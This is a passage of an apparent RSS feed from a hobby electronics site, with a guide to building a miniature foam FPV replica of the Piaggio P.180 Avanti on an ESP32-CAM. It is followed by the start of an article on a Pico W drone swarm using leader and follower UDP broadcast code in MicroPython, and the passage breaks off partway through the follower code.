Controls&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Future Upgrades&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Safety Notes&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;hr&gt;&lt;h2&gt;1. Introduction&lt;/h2&gt;&lt;p&gt;The Piaggio P.180 Avanti is an Italian twin turboprop aircraft known for its unique canard configuration and rear-mounted pushing propellers. In this miniature foam replica, we aim to capture its basic shape and unique look while enabling real-time FPV control.&lt;/p&gt;&lt;p&gt;Goals:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Lightweight foam airframe (&amp;lt; 70g total)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;ESP32-CAM FPV streaming to phone&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Basic two-channel control (e.g., rudder + elevator or dual motor thrust)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Simplified build with minimal parts&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;2. Materials and Components&lt;/h2&gt;&lt;h3&gt;Electronics:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;ESP32-CAM&lt;/strong&gt; (for FPV stream)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;ESP32 Dev Module / RP2040 with ESP8285&lt;/strong&gt; (for control logic)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;DRV8833&lt;/strong&gt; motor driver&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;2x brushed motors (6 mm or 7 mm)&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;2x 65 mm propellers&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;LiPo Battery&lt;/strong&gt;: 3.7V 300–500 mAh&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Coil actuators x2&lt;/strong&gt; (optional, for canards or rudder)&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt;Frame and Structure:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Foam board / depron / insulation foam / foam trays&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Carbon rods or skewers&lt;/strong&gt; (for reinforcement)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Hot glue, UHU Por, or foam-safe CA glue&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Utility knife, ruler, pencil&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt;Optional:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Mobile app for viewing ESP32-CAM stream (e.g., MJPEG Viewer)&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Voltage regulator (if needed for ESP32/Camera)&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;3. Airframe Design and Construction&lt;/h2&gt;&lt;p&gt;The P.180 Avanti layout includes a forward canard, mid-fuselage wing, and rear pusher propeller(s). We'll approximate this layout using lightweight foam.&lt;/p&gt;&lt;h3&gt;Fuselage:&lt;/h3&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;Cut a fuselage body (approx. 25–30 cm long) with a rounded nose.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Hollow out or layer foam to leave space for electronics.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Reinforce the fuselage with a carbon spar.&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;h3&gt;Wings:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Mid-wing of approx. 20–25 cm span, slightly swept back.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Add dihedral for stability.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt;Canards:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Small forward-mounted canards (5–7 cm span)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Controlled via coil actuator or fixed angle.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt;Mounting:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Leave compartment for battery and microcontroller access.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Design for easy access to the ESP32-CAM for angle adjustments.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;4. Electronics Integration&lt;/h2&gt;&lt;h3&gt;Wiring Layout:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Power the ESP32-CAM and controller via the same LiPo battery (regulated if needed).&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Connect motor outputs to DRV8833, and control inputs to the microcontroller.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;If using coil actuators, connect via GPIOs with transistor drivers.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt;Placement:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Place heavy components (battery, motor) as close to the center of gravity (CG) as possible.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Mount camera facing forward through a small cutout.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;5. Motor and Actuator Setup&lt;/h2&gt;&lt;h3&gt;Option A: Twin motor thrust control&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Mount two motors on the rear of the fuselage in pusher configuration.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Vary motor speeds for turning (differential thrust).&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt;Option B: One motor + coil actuators&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Use a single pusher motor.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Add two coil actuators to move canards or rudder/elevator.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;DRV8833 can drive both brushed motors and coil actuators.&lt;/p&gt;&lt;hr&gt;&lt;h2&gt;6. FPV System Configuration&lt;/h2&gt;&lt;p&gt;ESP32-CAM can broadcast live video over Wi-Fi.&lt;/p&gt;&lt;h3&gt;Steps:&lt;/h3&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;Flash the ESP32-CAM with MJPEG streaming sketch.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Connect to its Wi-Fi access point with a smartphone.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Open MJPEG stream in a browser or app.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Mount the camera module in the front of the plane.&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;hr&gt;&lt;h2&gt;7. Power Supply and Battery Mounting&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Use a 3.7V 300–500 mAh LiPo battery.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Keep it centered for balance.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;If necessary, use a buck/boost regulator for 5V components.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Estimated power usage:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Motors: ~1–2A each under load&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;ESP32-CAM: ~200–250 mA during streaming&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Control board: ~100 mA&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;8. Weight Optimization&lt;/h2&gt;&lt;p&gt;Target total weight: 50–70 grams&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Use the lightest possible foam.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Avoid long wires; keep layout compact.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Consider 6 mm brushed motors over 7 mm.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Use one motor if thrust is sufficient.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Remove unused camera features (e.g., flash LED).&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;9. Testing and Calibration&lt;/h2&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;Test each electronic component before embedding it.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Balance the plane on its CG point (roughly 1/3 wing chord).&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Calibrate motor thrust to ensure liftoff is possible.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Stream FPV video and verify quality and latency.&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;hr&gt;&lt;h2&gt;10. Flying and Controls&lt;/h2&gt;&lt;h3&gt;Control Methods:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Use ESP32 to control motors via Wi-Fi or preprogrammed logic.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Use a Bluetooth joystick or mobile app (optional).&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Launch tips:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Hand-launch in calm wind.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Keep first flights short.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Monitor FPV stream and battery.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;11. Future Upgrades&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Add gyro for stabilization (MPU6050 or similar)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Add GPS for telemetry&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Use larger battery or solar cell for more endurance&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Integrate OTA updates for ESP32&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Add full servo-based control surfaces&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;12. Safety Notes&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Always fly in an open area.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Avoid flying near people or animals.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Check battery and propellers before every flight.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Monitor temperatures and ensure ESP32 doesn’t overheat.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;Conclusion&lt;/h2&gt;&lt;p&gt;This build is a fantastic mix of creativity, electronics, and aerodynamics. It proves that even microcontrollers and foam can achieve functional FPV flight. The result is a charming, functional miniature replica of the Piaggio P.180 Avanti.&lt;/p&gt;&lt;p&gt;Let your mini Avanti soar!&lt;/p&gt;&lt;hr&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Download code &lt;a rel="nofollow" href="http://asky.uk/Downloads/drone_full_code.rtf"&gt;&lt;strong&gt;HERE&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;</description>
<category>ESP32 / ESP32 Zero</category>
<guid isPermaLink="true">https://asky.uk/92/how-to-build-a-mini-fpv-piaggio-180-avanti-replica-with-esp32</guid>
<pubDate>Sat, 19 Jul 2025 11:13:44 +0000</pubDate>
<enclosure length="13029" type="application/rtf" url="http://asky.uk/Downloads/drone_full_code.rtf"/><itunes:explicit/><itunes:subtitle>This guide will walk you through the step-by-step process of building a compact, lightweight FPV-capable replica of the Piaggio P.180 Avanti aircraft. The build focuses on using inexpensive components like foam (e.g., styrofoam or depron), brushed motors, an ESP32-CAM module for FPV, and basic control via coil actuators or dual-motor thrust vectoring. The aim is to create a functional, minimalist FPV plane using microcontrollers and camera modules that can be controlled via a smartphone. Table of Contents Introduction Materials and Components Airframe Design and Construction Electronics Integration Motor and Actuator Setup FPV System Configuration Power Supply and Battery Mounting Weight Optimization Testing and Calibration Flying and Controls Future Upgrades Safety Notes1. Introduction The Piaggio P.180 Avanti is an Italian twin turboprop aircraft known for its unique canard configuration and rear-mounted pushing propellers. In this miniature foam replica, we aim to capture its basic shape and unique look while enabling real-time FPV control. Goals: Lightweight foam airframe (&amp;lt; 70g total) ESP32-CAM FPV streaming to phone Basic two-channel control (e.g., rudder + elevator or dual motor thrust) Simplified build with minimal parts2. Materials and ComponentsElectronics: ESP32-CAM (for FPV stream) ESP32 Dev Module / RP2040 with ESP8285 (for control logic) DRV8833 motor driver 2x brushed motors (6 mm or 7 mm) 2x 65 mm propellers LiPo Battery: 3.7V 300–500 mAh Coil actuators x2 (optional, for canards or rudder)Frame and Structure: Foam board / depron / insulation foam / foam trays Carbon rods or skewers (for reinforcement) Hot glue, UHU Por, or foam-safe CA glue Utility knife, ruler, pencilOptional: Mobile app for viewing ESP32-CAM stream (e.g., MJPEG Viewer) Voltage regulator (if needed for ESP32/Camera)3. Airframe Design and Construction The P.180 Avanti layout includes a forward canard, mid-fuselage wing, and rear pusher propeller(s). We'll approximate this layout using lightweight foam.Fuselage: Cut a fuselage body (approx. 25–30 cm long) with a rounded nose. Hollow out or layer foam to leave space for electronics. Reinforce the fuselage with a carbon spar.Wings: Mid-wing of approx. 20–25 cm span, slightly swept back. Add dihedral for stability.Canards: Small forward-mounted canards (5–7 cm span) Controlled via coil actuator or fixed angle.Mounting: Leave compartment for battery and microcontroller access. Design for easy access to the ESP32-CAM for angle adjustments.4. Electronics IntegrationWiring Layout: Power the ESP32-CAM and controller via the same LiPo battery (regulated if needed). Connect motor outputs to DRV8833, and control inputs to the microcontroller. If using coil actuators, connect via GPIOs with transistor drivers.Placement: Place heavy components (battery, motor) as close to the center of gravity (CG) as possible. Mount camera facing forward through a small cutout.5. Motor and Actuator SetupOption A: Twin motor thrust control Mount two motors on the rear of the fuselage in pusher configuration. Vary motor speeds for turning (differential thrust).Option B: One motor + coil actuators Use a single pusher motor. Add two coil actuators to move canards or rudder/elevator. DRV8833 can drive both brushed motors and coil actuators.6. FPV System Configuration ESP32-CAM can broadcast live video over Wi-Fi.Steps: Flash the ESP32-CAM with MJPEG streaming sketch. Connect to its Wi-Fi access point with a smartphone. Open MJPEG stream in a browser or app. Mount the camera module in the front of the plane.7. Power Supply and Battery Mounting Use a 3.7V 300–500 mAh LiPo battery. Keep it centered for balance. If necessary, use a buck/boost regulator for 5V components. Estimated power usage: Motors: ~1–2A each under load ESP32-CAM: ~200–250 mA during streaming Control board: ~100 mA8. Weight Optimization Target total weight: 50–70 grams Use the lightest possible foam. Avoid long wires; keep layout compact. Consider 6 mm brushed motors over 7 mm. Use one motor if thrust is sufficient. Remove unused camera features (e.g., flash LED).9. Testing and Calibration Test each electronic component before embedding it. Balance the plane on its CG point (roughly 1/3 wing chord). Calibrate motor thrust to ensure liftoff is possible. Stream FPV video and verify quality and latency.10. Flying and ControlsControl Methods: Use ESP32 to control motors via Wi-Fi or preprogrammed logic. Use a Bluetooth joystick or mobile app (optional). Launch tips: Hand-launch in calm wind. Keep first flights short. Monitor FPV stream and battery.11. Future Upgrades Add gyro for stabilization (MPU6050 or similar) Add GPS for telemetry Use larger battery or solar cell for more endurance Integrate OTA updates for ESP32 Add full servo-based control surfaces12. Safety Notes Always fly in an open area. Avoid flying near people or animals. Check battery and propellers before every flight. Monitor temperatures and ensure ESP32 doesn’t overheat.Conclusion This build is a fantastic mix of creativity, electronics, and aerodynamics. It proves that even microcontrollers and foam can achieve functional FPV flight. The result is a charming, functional miniature replica of the Piaggio P.180 Avanti. Let your mini Avanti soar! Download code HERE</itunes:subtitle><itunes:summary>This guide will walk you through the step-by-step process of building a compact, lightweight FPV-capable replica of the Piaggio P.180 Avanti aircraft. The build focuses on using inexpensive components like foam (e.g., styrofoam or depron), brushed motors, an ESP32-CAM module for FPV, and basic control via coil actuators or dual-motor thrust vectoring. The aim is to create a functional, minimalist FPV plane using microcontrollers and camera modules that can be controlled via a smartphone. Table of Contents Introduction Materials and Components Airframe Design and Construction Electronics Integration Motor and Actuator Setup FPV System Configuration Power Supply and Battery Mounting Weight Optimization Testing and Calibration Flying and Controls Future Upgrades Safety Notes1. Introduction The Piaggio P.180 Avanti is an Italian twin turboprop aircraft known for its unique canard configuration and rear-mounted pushing propellers. In this miniature foam replica, we aim to capture its basic shape and unique look while enabling real-time FPV control. Goals: Lightweight foam airframe (&amp;lt; 70g total) ESP32-CAM FPV streaming to phone Basic two-channel control (e.g., rudder + elevator or dual motor thrust) Simplified build with minimal parts2. Materials and ComponentsElectronics: ESP32-CAM (for FPV stream) ESP32 Dev Module / RP2040 with ESP8285 (for control logic) DRV8833 motor driver 2x brushed motors (6 mm or 7 mm) 2x 65 mm propellers LiPo Battery: 3.7V 300–500 mAh Coil actuators x2 (optional, for canards or rudder)Frame and Structure: Foam board / depron / insulation foam / foam trays Carbon rods or skewers (for reinforcement) Hot glue, UHU Por, or foam-safe CA glue Utility knife, ruler, pencilOptional: Mobile app for viewing ESP32-CAM stream (e.g., MJPEG Viewer) Voltage regulator (if needed for ESP32/Camera)3. Airframe Design and Construction The P.180 Avanti layout includes a forward canard, mid-fuselage wing, and rear pusher propeller(s). We'll approximate this layout using lightweight foam.Fuselage: Cut a fuselage body (approx. 25–30 cm long) with a rounded nose. Hollow out or layer foam to leave space for electronics. Reinforce the fuselage with a carbon spar.Wings: Mid-wing of approx. 20–25 cm span, slightly swept back. Add dihedral for stability.Canards: Small forward-mounted canards (5–7 cm span) Controlled via coil actuator or fixed angle.Mounting: Leave compartment for battery and microcontroller access. Design for easy access to the ESP32-CAM for angle adjustments.4. Electronics IntegrationWiring Layout: Power the ESP32-CAM and controller via the same LiPo battery (regulated if needed). Connect motor outputs to DRV8833, and control inputs to the microcontroller. If using coil actuators, connect via GPIOs with transistor drivers.Placement: Place heavy components (battery, motor) as close to the center of gravity (CG) as possible. Mount camera facing forward through a small cutout.5. Motor and Actuator SetupOption A: Twin motor thrust control Mount two motors on the rear of the fuselage in pusher configuration. Vary motor speeds for turning (differential thrust).Option B: One motor + coil actuators Use a single pusher motor. Add two coil actuators to move canards or rudder/elevator. DRV8833 can drive both brushed motors and coil actuators.6. FPV System Configuration ESP32-CAM can broadcast live video over Wi-Fi.Steps: Flash the ESP32-CAM with MJPEG streaming sketch. Connect to its Wi-Fi access point with a smartphone. Open MJPEG stream in a browser or app. Mount the camera module in the front of the plane.7. Power Supply and Battery Mounting Use a 3.7V 300–500 mAh LiPo battery. Keep it centered for balance. If necessary, use a buck/boost regulator for 5V components. Estimated power usage: Motors: ~1–2A each under load ESP32-CAM: ~200–250 mA during streaming Control board: ~100 mA8. Weight Optimization Target total weight: 50–70 grams Use the lightest possible foam. Avoid long wires; keep layout compact. Consider 6 mm brushed motors over 7 mm. Use one motor if thrust is sufficient. Remove unused camera features (e.g., flash LED).9. Testing and Calibration Test each electronic component before embedding it. Balance the plane on its CG point (roughly 1/3 wing chord). Calibrate motor thrust to ensure liftoff is possible. Stream FPV video and verify quality and latency.10. Flying and ControlsControl Methods: Use ESP32 to control motors via Wi-Fi or preprogrammed logic. Use a Bluetooth joystick or mobile app (optional). Launch tips: Hand-launch in calm wind. Keep first flights short. Monitor FPV stream and battery.11. Future Upgrades Add gyro for stabilization (MPU6050 or similar) Add GPS for telemetry Use larger battery or solar cell for more endurance Integrate OTA updates for ESP32 Add full servo-based control surfaces12. Safety Notes Always fly in an open area. Avoid flying near people or animals. Check battery and propellers before every flight. Monitor temperatures and ensure ESP32 doesn’t overheat.Conclusion This build is a fantastic mix of creativity, electronics, and aerodynamics. It proves that even microcontrollers and foam can achieve functional FPV flight. The result is a charming, functional miniature replica of the Piaggio P.180 Avanti. Let your mini Avanti soar! Download code HERE</itunes:summary><itunes:keywords>ESP32 / ESP32 Zero</itunes:keywords></item>
<item>
<title>Creating a Swarm of Drones with Raspberry Pi Pico W and MicroPython</title>
<link>https://asky.uk/79/creating-swarm-drones-with-raspberry-pico-and-micropython</link>
<description>&lt;h2 data-start="419" data-end="434"&gt;Introduction&lt;/h2&gt;&lt;p data-start="436" data-end="698"&gt;Building a drone swarm is no longer a concept reserved for large military or research institutions. With affordable hardware like the &lt;strong data-start="570" data-end="593"&gt;Raspberry Pi Pico W&lt;/strong&gt;, hobbyists and developers can experiment with &lt;strong data-start="640" data-end="675"&gt;coordinated multi-agent systems&lt;/strong&gt; using &lt;strong data-start="682" data-end="697"&gt;MicroPython&lt;/strong&gt;.&lt;/p&gt;&lt;p data-start="700" data-end="731"&gt;In this article, we'll explore:&lt;/p&gt;&lt;ul data-start="733" data-end="917"&gt;&lt;li data-start="733" data-end="777"&gt;&lt;p data-start="735" data-end="777"&gt;The hardware needed for a swarm of drones.&lt;/p&gt;&lt;/li&gt;&lt;li data-start="778" data-end="826"&gt;&lt;p data-start="780" data-end="826"&gt;How to set up communication using Wi-Fi (UDP).&lt;/p&gt;&lt;/li&gt;&lt;li data-start="827" data-end="857"&gt;&lt;p data-start="829" data-end="857"&gt;Leader-follower swarm logic.&lt;/p&gt;&lt;/li&gt;&lt;li data-start="858" data-end="917"&gt;&lt;p data-start="860" data-end="917"&gt;Example code for both &lt;strong data-start="882" data-end="892"&gt;leader&lt;/strong&gt; and &lt;strong data-start="897" data-end="909"&gt;follower&lt;/strong&gt; drones.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr data-start="919" data-end="922"&gt;&lt;h2 data-start="924" data-end="951"&gt; Hardware Requirements&lt;/h2&gt;&lt;p data-start="953" data-end="989"&gt;Each drone in the swarm should have:&lt;/p&gt;&lt;ul data-start="991" data-end="1313"&gt;&lt;li data-start="991" data-end="1018"&gt;&lt;p data-start="993" data-end="1018"&gt;&lt;strong data-start="993" data-end="1016"&gt;Raspberry Pi Pico W&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1019" data-end="1070"&gt;&lt;p data-start="1021" data-end="1070"&gt;&lt;strong data-start="1021" data-end="1047"&gt;Motor controller (ESC)&lt;/strong&gt; for brushless motors&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1071" data-end="1111"&gt;&lt;p data-start="1073" data-end="1111"&gt;&lt;strong data-start="1073" data-end="1109"&gt;EDF or propeller with BLDC motor&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1112" data-end="1139"&gt;&lt;p data-start="1114" data-end="1139"&gt;&lt;strong data-start="1114" data-end="1137"&gt;IMU (e.g., MPU6050)&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1140" data-end="1227"&gt;&lt;p data-start="1142" data-end="1227"&gt;&lt;strong data-start="1142" data-end="1154"&gt;Optional&lt;/strong&gt;: GPS module (e.g., M10Q), barometer (e.g., BMP280), or airspeed sensor&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1228" data-end="1265"&gt;&lt;p data-start="1230" data-end="1265"&gt;&lt;strong data-start="1230" data-end="1263"&gt;LiPo Battery (3.7V or higher)&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1266" data-end="1313"&gt;&lt;p data-start="1268" data-end="1313"&gt;&lt;strong data-start="1268" data-end="1277"&gt;Frame&lt;/strong&gt; (custom 3D-printed or carbon fiber)&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p data-start="1315" data-end="1520"&gt;Note: This article assumes that basic drone flight control (ESC control, stabilization) is implemented or handled by another module. Here, we focus purely on &lt;strong data-start="1473" data-end="1501"&gt;swarm coordination logic&lt;/strong&gt; using MicroPython.&lt;/p&gt;&lt;hr data-start="1522" data-end="1525"&gt;&lt;h2 data-start="1527" data-end="1573"&gt; Communication via UDP Broadcast (Pico W)&lt;/h2&gt;&lt;p data-start="1575" data-end="1656"&gt;We'll use &lt;strong data-start="1585" data-end="1611"&gt;UDP broadcast messages&lt;/strong&gt; over Wi-Fi for communication between drones.&lt;/p&gt;&lt;h3 data-start="1658" data-end="1678"&gt; Network Setup&lt;/h3&gt;&lt;p data-start="1680" data-end="1828"&gt;Each Pico W connects to the same Wi-Fi network (or one acts as access point). They communicate by broadcasting position data (X, Y, Z) and commands.&lt;/p&gt;&lt;h2 data-start="1835" data-end="1861"&gt; MicroPython Firmware&lt;/h2&gt;&lt;p data-start="1863" data-end="1920"&gt;Install MicroPython firmware on each Raspberry Pi Pico W.&lt;/p&gt;&lt;blockquote data-start="1922" data-end="2030"&gt;&lt;p data-start="1924" data-end="2030"&gt;Flash it from &lt;a data-start="1938" data-end="2030" class="cursor-pointer" rel="noopener" target="_new"&gt;https://micropython.org/download/rp2-pico-w/&lt;/a&gt;&lt;/p&gt;&lt;/blockquote&gt;&lt;p data-start="2032" data-end="2095"&gt;Then, use &lt;strong data-start="2042" data-end="2052"&gt;Thonny&lt;/strong&gt; or &lt;strong data-start="2056" data-end="2066"&gt;rshell&lt;/strong&gt; to upload the scripts below.&lt;/p&gt;&lt;h2 data-start="2102" data-end="2126"&gt;1️⃣ Leader Drone Code&lt;/h2&gt;&lt;p data-start="2128" data-end="2198"&gt;This drone sends its current position and a command every 0.5 seconds.&lt;/p&gt;&lt;p data-start="2128" data-end="2198"&gt;# leader.py&lt;br&gt;import network&lt;br&gt;import socket&lt;br&gt;import time&lt;br&gt;&lt;br&gt;SSID = 'YourWiFi'&lt;br&gt;PASSWORD = 'YourPassword'&lt;br&gt;PORT = 5005&lt;br&gt;BROADCAST_IP = '255.255.255.255'&lt;br&gt;&lt;br&gt;def connect():&lt;br&gt;&amp;nbsp; &amp;nbsp; wlan = network.WLAN(network.STA_IF)&lt;br&gt;&amp;nbsp; &amp;nbsp; wlan.active(True)&lt;br&gt;&amp;nbsp; &amp;nbsp; wlan.connect(SSID, PASSWORD)&lt;br&gt;&amp;nbsp; &amp;nbsp; while not wlan.isconnected():&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; print("Connecting...")&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; time.sleep(1)&lt;br&gt;&amp;nbsp; &amp;nbsp; print("Connected to", SSID)&lt;br&gt;&amp;nbsp; &amp;nbsp; print("IP:", wlan.ifconfig())&lt;br&gt;&lt;br&gt;def send_command():&lt;br&gt;&amp;nbsp; &amp;nbsp; s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)&lt;br&gt;&amp;nbsp; &amp;nbsp; s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)&lt;br&gt;&amp;nbsp; &amp;nbsp; while True:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; # Simulated coordinates (you can read from sensors)&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x, y, z = 10, 20, 5&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; msg = f"{x},{y},{z},FOLLOW"&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; s.sendto(msg.encode(), (BROADCAST_IP, PORT))&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; print("Sent:", msg)&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; time.sleep(0.5)&lt;br&gt;&lt;br&gt;connect()&lt;br&gt;send_command()&lt;/p&gt;&lt;h2 data-start="3036" data-end="3062"&gt;2️⃣ Follower Drone Code&lt;/h2&gt;&lt;p data-start="3064" data-end="3156"&gt;Each follower receives the command and adjusts its own course to match or follow the leader.&lt;/p&gt;&lt;p data-start="3064" data-end="3156"&gt;# follower.py&lt;br&gt;import network&lt;br&gt;import socket&lt;br&gt;import time&lt;br&gt;&lt;br&gt;SSID = 'YourWiFi'&lt;br&gt;PASSWORD = 'YourPassword'&lt;br&gt;PORT = 5005&lt;br&gt;&lt;br&gt;def connect():&lt;br&gt;&amp;nbsp; &amp;nbsp; wlan = network.WLAN(network.STA_IF)&lt;br&gt;&amp;nbsp; &amp;nbsp; wlan.active(True)&lt;br&gt;&amp;nbsp; &amp;nbsp; wlan.connect(SSID, PASSWORD)&lt;br&gt;&amp;nbsp; &amp;nbsp; while not wlan.isconnected():&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; print("Connecting...")&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; time.sleep(1)&lt;br&gt;&amp;nbsp; &amp;nbsp; print("Connected to", SSID)&lt;br&gt;&amp;nbsp; &amp;nbsp; print("IP:", 